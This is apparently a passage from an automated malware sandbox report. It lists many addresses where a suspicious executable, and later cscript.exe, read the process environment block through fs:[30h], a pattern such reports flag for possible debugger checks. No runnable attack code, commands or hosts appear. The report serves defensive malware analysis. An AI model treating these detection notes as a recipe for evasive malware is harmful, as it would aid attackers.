          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AB3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A95210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A95210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A95210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A95210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B4B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B4B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B68A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B24257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A99240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A99240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A99240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A99240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B65BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B4D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B5138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B153CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B153CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B5131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B68B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B16CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B16CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B16CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B514FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B68CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B6740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B6740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B6740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B16C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B16C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B16C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B16C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AB746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B2C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B2C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B48DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AAD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AAD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B16DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B68D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B1A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B13540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AB7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B60EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B60EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B60EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B146A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B2FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B68ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B4FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B4FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B17794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B17794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B17794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A94F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A94F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B2FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B2FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B6070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B6070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AAFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B68F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AAEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04948CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_049314FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0494740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0494740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0494740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048ABC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0490C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0490C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0489746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04872D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04872D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04872D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04872D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04872D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_049405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_049405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048F6DC9 mov eax, dword ptr fs:[00000030h]
